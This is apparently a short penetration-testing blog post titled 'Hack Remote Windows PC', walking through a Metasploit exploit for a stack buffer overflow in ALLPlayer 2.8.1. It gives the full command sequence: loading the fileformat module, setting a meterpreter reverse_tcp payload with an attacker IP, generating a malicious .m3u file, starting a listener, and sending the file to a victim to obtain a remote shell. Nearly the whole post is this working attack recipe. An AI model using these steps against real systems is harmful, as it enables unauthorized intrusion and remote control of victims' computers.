Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows PC using ALLPlayer M3U Buffer Overflow

This Metasploit module exploits a stack-based buffer overflow vulnerability in ALLPlayer 2.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows 7 SP1.

Exploit Targets

ALLPlayer 2.8.1

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/allplayer_m3u_bof

msf exploit (allplayer_m3u_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (allplayer_m3u_bof)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (allplayer_m3u_bof)>exploit 

After we successfully generate the malicious m3u File, it will stored on your local computer

/root/.msf4/local/msf.m3u

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.104

exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer